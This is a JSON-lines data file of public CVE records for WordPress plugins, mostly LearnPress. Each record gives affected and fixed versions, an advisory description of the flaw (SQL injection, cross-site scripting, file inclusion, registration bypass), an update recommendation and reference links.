{"CVE_ID":"CVE-2025-4105","slug":"splitit-installment-payments","versionImpact":"4.2.8","versionEndExcluding":"4.2.9","description":"The Splitit plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on several functions in the 'splitIt-flexfields-payment-gateway.php' file in all versions up to, and including, 4.2.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change plugin settings, including changing the environment from sandbox to production and vice versa.","recommendation":"Update to version 4.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/splitit-installment-payments\\\/tags\\\/4.2.6\\\/splitIt-flexfields-payment-gateway.php#L1927\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/splitit-installment-payments\\\/tags\\\/4.2.6\\\/splitIt-flexfields-payment-gateway.php#L1927\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/splitit-installment-payments\\\/tags\\\/4.2.6\\\/splitIt-flexfields-payment-gateway.php#L765\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/splitit-installment-payments\\\/tags\\\/4.2.6\\\/splitIt-flexfields-payment-gateway.php#L765\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6471b075-8115-4d38-a7dd-2308dca69f15?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6471b075-8115-4d38-a7dd-2308dca69f15?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4061","slug":"survey-maker","versionImpact":"4.2.8","versionEndExcluding":"4.2.9","description":"The Survey Maker  WordPress plugin before 4.2.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 4.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/175a9f3a-1f8d-44d1-8a12-e037251b025d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/175a9f3a-1f8d-44d1-8a12-e037251b025d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9205","slug":"maximum-products-per-user-for-woocommerce","versionImpact":"4.2.8","versionEndExcluding":"4.2.9","description":"The Maximum Products per User for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.2.8. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/140c0d22-dc26-4100-a5c0-a2f8a6f98d97?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/140c0d22-dc26-4100-a5c0-a2f8a6f98d97?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maximum-products-per-user-for-woocommerce\\\/tags\\\/4.2.8\\\/includes\\\/class-alg-wc-mppu-users.php#L836\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maximum-products-per-user-for-woocommerce\\\/tags\\\/4.2.8\\\/includes\\\/class-alg-wc-mppu-users.php#L836\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164534\\\/maximum-products-per-user-for-woocommerce\\\/tags\\\/4.2.9\\\/includes\\\/class-alg-wc-mppu-users.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164534\\\/maximum-products-per-user-for-woocommerce\\\/tags\\\/4.2.9\\\/includes\\\/class-alg-wc-mppu-users.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13128","slug":"learnpress","versionImpact":"4.2.7.5","versionEndExcluding":"4.2.7.5.1","description":"The LearnPress  WordPress plugin before 4.2.7.5.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.2.7.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1506a339-f85a-408a-8efa-ca83eb3b3ffb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1506a339-f85a-408a-8efa-ca83eb3b3ffb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13127","slug":"learnpress","versionImpact":"4.2.7.5","versionEndExcluding":"4.2.7.5.1","description":"The LearnPress  WordPress plugin before 4.2.7.5.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.2.7.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/003ac248-74db-4b83-af0b-aa37ffb9b3d3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/003ac248-74db-4b83-af0b-aa37ffb9b3d3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11868","slug":"learnpress","versionImpact":"4.2.7.3","versionEndExcluding":"4.2.7.4","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.2.7.3 via class-lp-rest-material-controller.php. This makes it possible for unauthenticated attackers to extract potentially sensitive paid course material.","recommendation":"Update to version 4.2.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200780\\\/learnpress\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200780\\\/learnpress\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bd43980-9193-4a63-adba-720dd1b11699?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bd43980-9193-4a63-adba-720dd1b11699?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9881","slug":"learnpress","versionImpact":"4.2.7.1","versionEndExcluding":"4.2.7.2","description":"The LearnPress  WordPress plugin before 4.2.7.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.2.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ec76f73a-7ad4-432d-8216-7cdb5603cef9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ec76f73a-7ad4-432d-8216-7cdb5603cef9\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ec76f73a-7ad4-432d-8216-7cdb5603cef9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ec76f73a-7ad4-432d-8216-7cdb5603cef9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10010","slug":"learnpress","versionImpact":"4.2.7.1","versionEndExcluding":"4.2.7.2","description":"The LearnPress  WordPress plugin before 4.2.7.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.2.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8a258d33-a354-4cbb-bfcb-31b7f1b1a036\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8a258d33-a354-4cbb-bfcb-31b7f1b1a036\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8529","slug":"learnpress","versionImpact":"4.2.7","versionEndExcluding":"4.2.7.1","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_fields' parameter of the \/wp-json\/lp\/v1\/courses\/archive-course REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.2.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2b2671e-0db7-4ba9-b574-a0122959e8fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2b2671e-0db7-4ba9-b574-a0122959e8fc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/learnpress\\\/tags\\\/4.2.7&new_path=\\\/learnpress\\\/tags\\\/4.2.7.1&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/learnpress\\\/tags\\\/4.2.7&new_path=\\\/learnpress\\\/tags\\\/4.2.7.1&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8522","slug":"learnpress","versionImpact":"4.2.7","versionEndExcluding":"4.2.7.1","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_only_fields' parameter of the \/wp-json\/learnpress\/v1\/courses REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.2.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e495507d-7eac-4f38-ab6f-b8f0809b2be4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e495507d-7eac-4f38-ab6f-b8f0809b2be4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/trunk\\\/inc\\\/jwt\\\/rest-api\\\/version1\\\/class-lp-rest-courses-v1-controller.php#L441\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/trunk\\\/inc\\\/jwt\\\/rest-api\\\/version1\\\/class-lp-rest-courses-v1-controller.php#L441\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148560\\\/learnpress\\\/tags\\\/4.2.7.1\\\/inc\\\/jwt\\\/rest-api\\\/version1\\\/class-lp-rest-courses-v1-controller.php?old=3138586&old_path=learnpress%2Ftags%2F4.2.7%2Finc%2Fjwt%2Frest-api%2Fversion1%2Fclass-lp-rest-courses-v1-controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148560\\\/learnpress\\\/tags\\\/4.2.7.1\\\/inc\\\/jwt\\\/rest-api\\\/version1\\\/class-lp-rest-courses-v1-controller.php?old=3138586&old_path=learnpress%2Ftags%2F4.2.7%2Finc%2Fjwt%2Frest-api%2Fversion1%2Fclass-lp-rest-courses-v1-controller.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6589","slug":"learnpress","versionImpact":"4.2.6.8.2","versionEndExcluding":"4.2.6.9","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.2.6.8.2 via the 'render_content_block_template' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 4.2.6.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba79bf95-08f8-4aa6-968b-f76a09ce52b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba79bf95-08f8-4aa6-968b-f76a09ce52b8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.8.2\\\/inc\\\/block-template\\\/class-block-template-archive-course.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.8.2\\\/inc\\\/block-template\\\/class-block-template-archive-course.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.8.2\\\/inc\\\/block-template\\\/class-block-template-single-course.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.8.2\\\/inc\\\/block-template\\\/class-block-template-single-course.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3124296\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3124296\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6099","slug":"learnpress","versionImpact":"4.2.6.8.1","versionEndExcluding":"4.2.6.8.2","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to unauthenticated bypass to user registration in versions up to, and including, 4.2.6.8.1. This is due to missing checks in the 'check_validate_fields' function in the checkout. This makes it possible for unauthenticated attackers to register as the default role on the site, even if registration is disabled.","recommendation":"Update to version 4.2.6.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ee714c7-4c9b-4627-9ba9-f83aeca6a0a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ee714c7-4c9b-4627-9ba9-f83aeca6a0a5?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.8.1\\\/inc\\\/class-lp-checkout.php#L124\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.8.1\\\/inc\\\/class-lp-checkout.php#L124\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3109339\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3109339\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]}]"}
{"CVE_ID":"CVE-2024-6088","slug":"learnpress","versionImpact":"4.2.6.8.1","versionEndExcluding":"4.2.6.8.2","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to unauthorized user registration due to a missing capability check on the 'register' function in all versions up to, and including, 4.2.6.8.1. This makes it possible for unauthenticated attackers to bypass disabled user registration to create a new account with the default role.","recommendation":"Update to version 4.2.6.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04e0ddff-16af-4c85-b5b0-cf767684ee08?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04e0ddff-16af-4c85-b5b0-cf767684ee08?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.8.1\\\/inc\\\/jwt\\\/includes\\\/class-jwt-public.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.8.1\\\/inc\\\/jwt\\\/includes\\\/class-jwt-public.php#L127\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.8.1\\\/inc\\\/class-lp-forms-handler.php#L235\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.8.1\\\/inc\\\/class-lp-forms-handler.php#L235\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3109339\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3109339\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]}]"}
{"CVE_ID":"CVE-2024-5483","slug":"learnpress","versionImpact":"4.2.6.8","versionEndExcluding":"4.2.6.8.1","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.2.6.8 due to incorrect implementation of get_items_permissions_check function. This makes it possible for unauthenticated attackers to extract basic information about website users, including their emails","recommendation":"Update to version 4.2.6.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/122b75d2-e882-45b9-baf1-acf847f8d60a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/122b75d2-e882-45b9-baf1-acf847f8d60a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.8\\\/inc\\\/jwt\\\/rest-api\\\/version1\\\/class-lp-rest-users-v1-controller.php#L130\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.8\\\/inc\\\/jwt\\\/rest-api\\\/version1\\\/class-lp-rest-users-v1-controller.php#L130\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4444","slug":"learnpress","versionImpact":"4.2.6.5","versionEndExcluding":"4.2.6.6","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to bypass to user registration in versions up to, and including, 4.2.6.5. This is due to missing checks in the 'create_account' function in the checkout. This makes it possible for unauthenticated attackers to register as the default role on the site, even if registration is disabled.","recommendation":"Update to version 4.2.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9e1410f-10c9-4654-8b61-cfcdde696da7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9e1410f-10c9-4654-8b61-cfcdde696da7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/inky-knuckle-2c2.notion.site\\\/Improper-Authentication-in-checkout-leads-privilege-escalation-of-unauthenticated-to-create-accoun-09da24a043884219a891dd1a0fc01af6\",\"name\":\"https:\\\/\\\/inky-knuckle-2c2.notion.site\\\/Improper-Authentication-in-checkout-leads-privilege-escalation-of-unauthenticated-to-create-accoun-09da24a043884219a891dd1a0fc01af6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.5\\\/inc\\\/class-lp-checkout.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.5\\\/inc\\\/class-lp-checkout.php#L79\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082204\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082204\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4434","slug":"learnpress","versionImpact":"4.2.6.5","versionEndExcluding":"4.2.6.6","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018term_id\u2019 parameter in versions up to, and including, 4.2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.2.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d64e1c6-1e25-4438-974d-b7da0979cc40?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d64e1c6-1e25-4438-974d-b7da0979cc40?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/inky-knuckle-2c2.notion.site\\\/Unauthenticated-SQLI-in-Learnpress-plugin-Latest-Version-4-2-6-5-a86fe63bcc7b4c9988802688211817fd?pvs=25\",\"name\":\"https:\\\/\\\/inky-knuckle-2c2.notion.site\\\/Unauthenticated-SQLI-in-Learnpress-plugin-Latest-Version-4-2-6-5-a86fe63bcc7b4c9988802688211817fd?pvs=25\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082204\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082204\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.5\\\/inc\\\/Databases\\\/class-lp-course-db.php#L508\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.5\\\/inc\\\/Databases\\\/class-lp-course-db.php#L508\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4397","slug":"learnpress","versionImpact":"4.2.6.5","versionEndExcluding":"4.2.6.6","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'save_post_materials' function in versions up to, and including, 4.2.6.5. This makes it possible for authenticated attackers, with Instructor-level permissions and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 4.2.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec20d5c4-4c41-4ec9-8d0a-ec8f03634f7d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec20d5c4-4c41-4ec9-8d0a-ec8f03634f7d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.5\\\/inc\\\/rest-api\\\/v1\\\/frontend\\\/class-lp-rest-material-controller.php#L98\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.5\\\/inc\\\/rest-api\\\/v1\\\/frontend\\\/class-lp-rest-material-controller.php#L98\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083657\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083657\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4277","slug":"learnpress","versionImpact":"4.2.6.5","versionEndExcluding":"4.2.6.6","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018layout_html\u2019 parameter in all versions up to, and including, 4.2.6.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.2.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46693edf-bcc6-4af8-9f26-5ede865f4694?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46693edf-bcc6-4af8-9f26-5ede865f4694?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.5\\\/inc\\\/ExternalPlugin\\\/Elementor\\\/Widgets\\\/Instructor\\\/ListInstructorsElementor.php?order=date#L96\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress\\\/tags\\\/4.2.6.5\\\/inc\\\/ExternalPlugin\\\/Elementor\\\/Widgets\\\/Instructor\\\/ListInstructorsElementor.php?order=date#L96\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6294","slug":"popup-builder","versionImpact":"4.2.5","versionEndExcluding":"4.2.6","description":"The Popup Builder WordPress plugin before 4.2.6 does not validate a parameter before making a request to it, which could allow users with the administrator role to perform SSRF attack in Multisite WordPress configurations.","recommendation":"Update to version 4.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eaeb5706-b19c-4266-b7df-889558ee2614\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eaeb5706-b19c-4266-b7df-889558ee2614\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2124","slug":"weglot","versionImpact":"4.2.5","versionEndExcluding":"4.2.6","description":"The Translate WordPress and go Multilingual \u2013 Weglot plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widget\/block in all versions up to, and including, 4.2.5 due to insufficient input sanitization and output escaping on user supplied attributes such as 'className'. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d87134e8-9d73-4a39-b071-37a5dac033b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d87134e8-9d73-4a39-b071-37a5dac033b4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weglot\\\/trunk\\\/src\\\/actions\\\/class-register-widget-weglot.php#L53\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weglot\\\/trunk\\\/src\\\/actions\\\/class-register-widget-weglot.php#L53\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3051523%40weglot&new=3051523%40weglot&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3051523%40weglot&new=3051523%40weglot&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6223","slug":"learnpress","versionImpact":"4.2.5.7","versionEndExcluding":"4.2.5.8","description":"The LearnPress plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.2.5.7 via the \/wp-json\/lp\/v1\/profile\/course-tab REST API due to missing validation on the 'userID' user controlled key. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve the details of another user's course progress.","recommendation":"Update to version 4.2.5.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/215d5d9e-dabb-462d-8c51-952f8c497b78?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/215d5d9e-dabb-462d-8c51-952f8c497b78?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013957\\\/learnpress\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013957\\\/learnpress\",\"refsource\":\"\",\"tags\":[]}]"}
